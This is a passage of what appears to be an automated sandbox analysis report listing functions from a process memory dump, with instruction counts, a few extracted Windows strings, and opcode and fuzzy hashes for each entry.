                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d8fc12f12b4e7df41f17e2530b833485884951066bb773bfe9c6375f113d5434
                • Instruction ID: 7db47a359d882350f71239edbbb84eb0092baf4edb57233578f828a0bf4c872a
                • Opcode Fuzzy Hash: d8fc12f12b4e7df41f17e2530b833485884951066bb773bfe9c6375f113d5434
                • Instruction Fuzzy Hash: D5A18D72608346CFC325CF28D480A2BBBF6BF98718F15496EE58597361E730E945CB92
                Function 0148B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: PreferredUILanguages
                • API String ID: 0-1884656846
                • Opcode ID: 0c84e47e555dc9f97be21ab7903ec6b6ee44f2743351d6a4be862418e36891ca
                • Instruction ID: 066033bab9c79a6ca969061a6f5a2b98dc1e606987fcc40b6aee995b42b257e6
                • Opcode Fuzzy Hash: 0c84e47e555dc9f97be21ab7903ec6b6ee44f2743351d6a4be862418e36891ca
                • Instruction Fuzzy Hash: 3F41B732D00219AFDB12EA99C840BEFB7B9EF45754F05016BEE11A7360D670DE40C7A0
                Function 0147705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: kLsE
                • API String ID: 0-3058123920
                • Opcode ID: 92ac69815b8e7897288053268fb9423c35be6bd5479789bf4b77efd7356b27a6
                • Instruction ID: 96cd4d2474d479b613cfd6c1d57bbc2dd2038017482fb42589294cc4cc26d4df
                • Opcode Fuzzy Hash: 92ac69815b8e7897288053268fb9423c35be6bd5479789bf4b77efd7356b27a6
                • Instruction Fuzzy Hash: 86419C722013424EE771AF78E98CBE63FA0EB10729F55412EED548A3F9CB704486C7A0
                Function 01407505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                • Instruction ID: 99db7e9359fd1df635da28363e326ba323e723b9f1bb54d449013659ecc7ea12
                • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                • Instruction Fuzzy Hash: 4F41D175900256EBDF22DF49C490BBEB7B4FB80302F00406BE985977A0D735E942CBA2
                Function 013D5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: Actx
                • API String ID: 0-89312691
                • Opcode ID: d45469c62492a58c5f671b90243e9b8d539c35e8eb66913f8d04d18e6b6415f8
                • Instruction ID: 29fa6f9206f265bb7473b7ef086c980bcf91a21053fa0943f0f8d1e86dfe9c20
                • Opcode Fuzzy Hash: d45469c62492a58c5f671b90243e9b8d539c35e8eb66913f8d04d18e6b6415f8
                • Instruction Fuzzy Hash: CB11B2337486068BFB254D2DA850636B7BDEB9526CF34813BE562CBB91E671DC418380
                Function 0145106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: LdrCreateEnclave
                • API String ID: 0-3262589265
                • Opcode ID: 91b4b2f3ce9296c2639bd9ab8d4575df6cd2f963f0c055a9eb8eb8ae18cff05b
                • Instruction ID: 0ce62e664a306c2e6de7edb8f2861511b3a8bae440fa952ee06543fcca6aa22b
                • Opcode Fuzzy Hash: 91b4b2f3ce9296c2639bd9ab8d4575df6cd2f963f0c055a9eb8eb8ae18cff05b
                • Instruction Fuzzy Hash: C021F5B15183449FC360DF1A8845A9BFBE8FBE5B40F004A1FF99496361DBB09404CB92
                Function 0142739A Relevance: .7, Instructions: 705COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 58d664e2a6d5c2b2e4b4ae690588a69938d09d81f1fe67f010f714b36b881417
                • Instruction ID: 063b675ac0b618c1567c4b52c7d445114f809f49252b65d6e9ee16b9107821a5
                • Opcode Fuzzy Hash: 58d664e2a6d5c2b2e4b4ae690588a69938d09d81f1fe67f010f714b36b881417
                • Instruction Fuzzy Hash: 7642C171A006268FDB19CF5DC4806BEFBB2FF98315B54816ED556AB360D734E882CB90
                Function 013FB2C0 Relevance: .6, Instructions: 629COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7c68e716e839e5e80318b0242e1c61cccd86e2105658b4a44b08fca064b19a81
                • Instruction ID: fa1a46bcd1d4806b24d87a8015d4e85995fbf503df4ef1d5389d8fb574a5c653
                • Opcode Fuzzy Hash: 7c68e716e839e5e80318b0242e1c61cccd86e2105658b4a44b08fca064b19a81
                • Instruction Fuzzy Hash: 0A32B1B1E01219DBDF14CF98C990BAEBBB5FF94718F18002EE905AB395E7359901CB90
                Function 0147A118 Relevance: .6, Instructions: 591COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 68902b2e8babb8efe5300657a219f235f16d73d491f5dcbac566421b73f27773
                • Instruction ID: abb97485367c778edfa0917b2a4674aaf0e62a42c41cfc00a626c8c13bdfa3ad
                • Opcode Fuzzy Hash: 68902b2e8babb8efe5300657a219f235f16d73d491f5dcbac566421b73f27773
                • Instruction Fuzzy Hash: DA22B0702046618BEB25CF2DC0947BABBF1AF44304F2C845BE9868F3A6D775E452CB61
                Function 013D65D0 Relevance: .4, Instructions: 383COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0bdf70f276ea6619fd57e14dadb04dd368a6d4659306df147d2b5e7cb0697f55
                • Instruction ID: 19f5060f0e1fe7d4debda78987a46df79acab9865334696c43266a7475c7b148
                • Opcode Fuzzy Hash: 0bdf70f276ea6619fd57e14dadb04dd368a6d4659306df147d2b5e7cb0697f55
                • Instruction Fuzzy Hash: 80E1B0B2508346CFC715CF28D490A6ABBE0FF88318F05896DF9A587351DB31E905CB92
                Function 013C8397 Relevance: .4, Instructions: 380COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d36ee3b6c93a71731411511fb7ed8e945438556613fdceec330bd208cf7c27a
                • Instruction ID: fec576cf09ce1a5fddf635e24d411b11e1aa1aa4e23b6b0a44fbe84838f6dc09
                • Opcode Fuzzy Hash: 7d36ee3b6c93a71731411511fb7ed8e945438556613fdceec330bd208cf7c27a
                • Instruction Fuzzy Hash: EAD1F571A0021ADBDB14DF29C880ABBBBA5FF54B18F04456EE915DB290F734EE91CB50
                Function 013EF460 Relevance: .3, Instructions: 321COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4cc0a45604be3b5c65bcc053bba36bf85da38d97d2bb5a059d8c12341c251383
                • Instruction ID: 4ff2b93e8069004d53e7b7f5b6d5feb742fa550d549d3b5340363a14b785237b
                • Opcode Fuzzy Hash: 4cc0a45604be3b5c65bcc053bba36bf85da38d97d2bb5a059d8c12341c251383
                • Instruction Fuzzy Hash: 7DC1F031A00335CBDB25CF2CC4987B97BE9FB94728F19415AD9469B3E5D7B08940CB50
                Function 013E0535 Relevance: .3, Instructions: 300COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                • Instruction ID: 91cc87dae1b65d8daf7f1516b36b0108610b4e9d37fb3f3d5b69112109e71a39
                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                • Instruction Fuzzy Hash: 87B1443170475A9FDB15DBA8C854BBFBBFAAF88204F28015AE1529B3D1D770E941CB90
                Function 013F90DB Relevance: .3, Instructions: 287COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 996e0f0e1ba838faeb696ab70ef429423b8d372431f7b0ebea0fa1c7dcb9ee4f
                • Instruction ID: 5e69dfcf22b69cab691409fb3b3272ce36d0b0ea4abd9575cd084aeb1f0c635a
                • Opcode Fuzzy Hash: 996e0f0e1ba838faeb696ab70ef429423b8d372431f7b0ebea0fa1c7dcb9ee4f
                • Instruction Fuzzy Hash: 87A17F71900216AFEB12DFA8CC45FAF7BB8AF99754F410059FA04AB2A0D775DC51CBA0
                Function 013D83C0 Relevance: .3, Instructions: 281COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ff7927de9101e5103713112a51cbf2eda115cf7ccccdea2fcea250b63c89a3c7
                • Instruction ID: 1a297072bd00296750c3813f81519fc83a026571854281a817e66020abccc1c7
                • Opcode Fuzzy Hash: ff7927de9101e5103713112a51cbf2eda115cf7ccccdea2fcea250b63c89a3c7
                • Instruction Fuzzy Hash: 44C15675108341CFE764CF19C484BABBBE5BF98708F44496EE989873A1D774E908CB92
                Function 013CC427 Relevance: .3, Instructions: 280COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f3d0f11ec4f60f0ac17a90ed3d63a067e06b649533288b96dfa180489d1d1790
                • Instruction ID: a38f95a99e2443f3c31b10bc25c9e8459b535934f5d84f788900c51c7f145666
                • Opcode Fuzzy Hash: f3d0f11ec4f60f0ac17a90ed3d63a067e06b649533288b96dfa180489d1d1790
                • Instruction Fuzzy Hash: C3B19270A002668BDB24CF69C890BA9B3B5EF54714F1485EED50EE7651EB34DDC5CB20
                Function 013FE5E7 Relevance: .3, Instructions: 278COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 971b3b478a4a20798d1bd4792f59ef7d099f98872e7a41ba07fede187e0304e0
                • Instruction ID: 101b5af0980fc9798ffa5cbf4446851607b62318020347acdae68a6c6fd97c96
                • Opcode Fuzzy Hash: 971b3b478a4a20798d1bd4792f59ef7d099f98872e7a41ba07fede187e0304e0
                • Instruction Fuzzy Hash: ACA10731E006599FEB21DB5CC844FAEBBA4BB44718F16013AEB10AB2B1D7749D45CB92
                Function 01410185 Relevance: .3, Instructions: 276COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4674d3292567313c92646e5d6da1a6cbd019b299455bf597246ae4f0a0bfc553
                • Instruction ID: 4f2d1201004ea77a5eb7027a56e324a8f49960bc25ec1589969306a730f4746e
                • Opcode Fuzzy Hash: 4674d3292567313c92646e5d6da1a6cbd019b299455bf597246ae4f0a0bfc553
                • Instruction Fuzzy Hash: 3AA1C170B0061A9FEB25CF69C590BABB7B1FF54314F04402BEA45973A9DB34E852CB50
                Function 014A4500 Relevance: .3, Instructions: 275COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e352290fe3c68bec3c4f073e08a3d36dea9e212246f237f8947c21ba2122784
                • Instruction ID: 77ccfe7b204fe14dd855a37729cd406bca6998c403cc813baac146b195e942b5
                • Opcode Fuzzy Hash: 5e352290fe3c68bec3c4f073e08a3d36dea9e212246f237f8947c21ba2122784
                • Instruction Fuzzy Hash: BDA1D172A00251DFC711DF18C980B6ABBE9FF68744F8A452EE5499B761C3B4ED01CB91
                Function 013EE3F0 Relevance: .3, Instructions: 261COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 34a91ba0c5e0421edd4a5975f9ec523caef25c16eba533781cf545f5b76f9d7a
                • Instruction ID: 2f67e1dc950b7357d21947d93e44d58557888f79f36e3b742d241142b5d45e8e
                • Opcode Fuzzy Hash: 34a91ba0c5e0421edd4a5975f9ec523caef25c16eba533781cf545f5b76f9d7a
                • Instruction Fuzzy Hash: 75910531A0072ACBEB24DB5DC448B7ABBE5EF98718F15807AE905AB3D0E674D901CB51
                Function 013D1131 Relevance: .3, Instructions: 259COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c499fa5639adccfa1bef532130a430347a791d77ee8b3a7846392300911f1aa3
                • Instruction ID: 3706661161479b536b1821a0b385d6b431151178b8ae6b906c3e1f0a876e3de4
                • Opcode Fuzzy Hash: c499fa5639adccfa1bef532130a430347a791d77ee8b3a7846392300911f1aa3
                • Instruction Fuzzy Hash: B4B101B56083518FD364CF28C580A5ABBF1BB88308F58496EF999D7362D371E985CB42
                Function 013D9486 Relevance: .3, Instructions: 259COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a2641bd38009e583f367fdd20feaad6709df7692a4b28358f72d0bce48ed023e
                • Instruction ID: 75947b0eddfc46d0df353faf83bf0cf5f0ef45d309f6e8ade1d9f6b7d06a7a80
                • Opcode Fuzzy Hash: a2641bd38009e583f367fdd20feaad6709df7692a4b28358f72d0bce48ed023e
                • Instruction Fuzzy Hash: 81B1A076900206CFDF25CF1CE194BA97BB1BB4831CF68456AE8259B2A6D770D842CB90
                Function 0148B52F Relevance: .2, Instructions: 222COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                • Instruction ID: 26063a20b3ba0c98fa238feaaf407e53551071a4484f440739de82105e23c43b
                • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                • Instruction Fuzzy Hash: 08719C35A0021A9FDB20FF69C490ABFBBF5EF54744F18411BE950AB361E334D9818BA0
                Function 013FD090 Relevance: .2, Instructions: 217COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                • Instruction ID: 68c2b4d5b7e1c8c1bb4c6e9563e6309b7cc0fa1e61ad355a681f46ffd0461028
                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                • Instruction Fuzzy Hash: 7C819072E0111A8BDF14CF9CC9897AEBBB2EBC8314F19416FCA15B7360D6319941CB91
                Function 0140E284 Relevance: .2, Instructions: 212COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a9bfe9679647802711c8df2df9a12dd10a8ca701caed906be0da8d4ea7b08f7b
                • Instruction ID: 0adb3df7c612523a5bef29a2920c871d72f8501fa1f4844d76835db0dd966f12
                • Opcode Fuzzy Hash: a9bfe9679647802711c8df2df9a12dd10a8ca701caed906be0da8d4ea7b08f7b
                • Instruction Fuzzy Hash: 9B817171900609AFDB26CFAAC880AEFBBF9FF48354F10442EE555A7260D730AC55DB50
                Function 0145035C Relevance: .2, Instructions: 198COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                • Instruction ID: 6ca01c0138da4c36a097d0ddebd46dbfa862c3680454e1fde6c6c0e10d826794
                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                • Instruction Fuzzy Hash: 0D717F75A00619AFDB10DFA9C984EDEBBF8FF58704F10456AE905A72A1DB30EA41CB50
                Function 014662A0 Relevance: .2, Instructions: 198COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba76a2b2af8544b3d09a9b63492e147646894eccb57ab9d2190aa2f71cb4a509
                • Instruction ID: 466634ff573257ab579233aa0ea1de42d15c765bf4de1314be4706d02e601c2f
                • Opcode Fuzzy Hash: ba76a2b2af8544b3d09a9b63492e147646894eccb57ab9d2190aa2f71cb4a509
                • Instruction Fuzzy Hash: 7E710332200701AFEB32DF18C844F56BBEAFF40768F16452AE2168B2B0D774E945CB51
                Function 0149132D Relevance: .2, Instructions: 188COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2bee04e3c1d0f1e145c993b914db5398e2e27ff6703cdc771ecde4b35d7a485a
                • Instruction ID: ff6958294a9ae0079780d53bdf671c8951f4509ffa07ea71d51bd43724e36e96
                • Opcode Fuzzy Hash: 2bee04e3c1d0f1e145c993b914db5398e2e27ff6703cdc771ecde4b35d7a485a
                • Instruction Fuzzy Hash: BB816D75A00206DFCB09CF69C480AAEBBF1FF88310F1581AAD859EB355D734EA41CB90
                Function 0149903E Relevance: .2, Instructions: 186COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aab389633c73b4ed6f9ea7dfd5c1b11176f090084733dda522e9e3af49ae4790
                • Instruction ID: 67e1d51b50237163ac608671ff0c22f4d77802deecb5db47ddedf71933477f67
                • Opcode Fuzzy Hash: aab389633c73b4ed6f9ea7dfd5c1b11176f090084733dda522e9e3af49ae4790
                • Instruction Fuzzy Hash: E761C0B1600616AFDB15DF69C884BABBFE8FB98718F00461EF85887260DB30E505CB91
                Function 014992A6 Relevance: .2, Instructions: 174COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2b02f151a13e81fc17750a347f8bb706b02afc528c7a14044db1122b8ab677d7
                • Instruction ID: a0f8d3d0e05c08f02fc941061d1c9900ed194c7eb80f9e40f46adc2de3a7b21f
                • Opcode Fuzzy Hash: 2b02f151a13e81fc17750a347f8bb706b02afc528c7a14044db1122b8ab677d7
                • Instruction Fuzzy Hash: BE61E8312087428BEB25CF69C454B6BBFE4BFA4718F18446EE9858B3E1D735E846C781
                Function 013CB2D3 Relevance: .2, Instructions: 161COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ece4321b011d2858c550073651d187b3f1fc21433da50cb2a4c3494d0bfcb5a
                • Instruction ID: 55e13ebced6ba33d8ad8d16d32b8bc8b1665fa87cbc7a0e710a0d0c68c0e3efb
                • Opcode Fuzzy Hash: 5ece4321b011d2858c550073651d187b3f1fc21433da50cb2a4c3494d0bfcb5a
                • Instruction Fuzzy Hash: 59412931240701EFD7269F1DD881B2AFBA9FF44B98F15843EE9099B2A5DB30DC418B90
                Function 0140B570 Relevance: .2, Instructions: 161COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 375c22533754ba4b2b2147097d475a4e08e035d0e5e168907d92b675acf747b2
                • Instruction ID: 61679617932f21c6cfcbf95ab9ed5c9fe6bfc91b53e01a267b4ebc85e3db4dc3
                • Opcode Fuzzy Hash: 375c22533754ba4b2b2147097d475a4e08e035d0e5e168907d92b675acf747b2
                • Instruction Fuzzy Hash: D7510A712042419FE731EF69CD95F6B7BA8EB94724F14062EFA11972B5DB30D801C7A1
                Function 0144D5D0 Relevance: .2, Instructions: 161COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                • Instruction ID: d4ad6297def3884e00bd295c84410abc12e341b0912e9dce95a18e74f1c7a8e9
                • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                • Instruction Fuzzy Hash: D051FB75A002439BEB11EFA99C4097B7BE5EFB4644F04042FFA48C7261E634C856C7A2
                Function 013F95DA Relevance: .2, Instructions: 160COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 779e396e21268de85b1d88a7d551bf12e51477f450692e334e0fd3db3af1b57a
                • Instruction ID: 14be4be8b757f6fb1a563b817945bdada5fb63fe381f81e42a417f1e3f5d27e7
                • Opcode Fuzzy Hash: 779e396e21268de85b1d88a7d551bf12e51477f450692e334e0fd3db3af1b57a
                • Instruction Fuzzy Hash: BA519070D00209ABEF229FA9CC80BEDBBB8FF55318F60012EE694A7161DB719844DF10
                Function 013D7152 Relevance: .2, Instructions: 158COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 34268afab766b15572a15f2bf3eddc4c1373e5ddbeef59898adb5be9ac0a1fe1
                • Instruction ID: 02b6526b228929bef9322db40c7f2dccdcec07e52559427a391075315092aa06
                • Opcode Fuzzy Hash: 34268afab766b15572a15f2bf3eddc4c1373e5ddbeef59898adb5be9ac0a1fe1
                • Instruction Fuzzy Hash: C9510632A0060AEFEB16DF78D944BBEB7B5FF5871DF14416AE512936A0DB709901CB80
                Function 0140E443 Relevance: .2, Instructions: 158COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 61c9ae6e83193abb0c7f10fb54566c5da8fd85e8c6fa2fd4b23e5c82f8b3843d
                • Instruction ID: 2c67eaabf2f48a2cdb2cd56c8ecb0c4751e043895e5319a96542b50260ae7d19
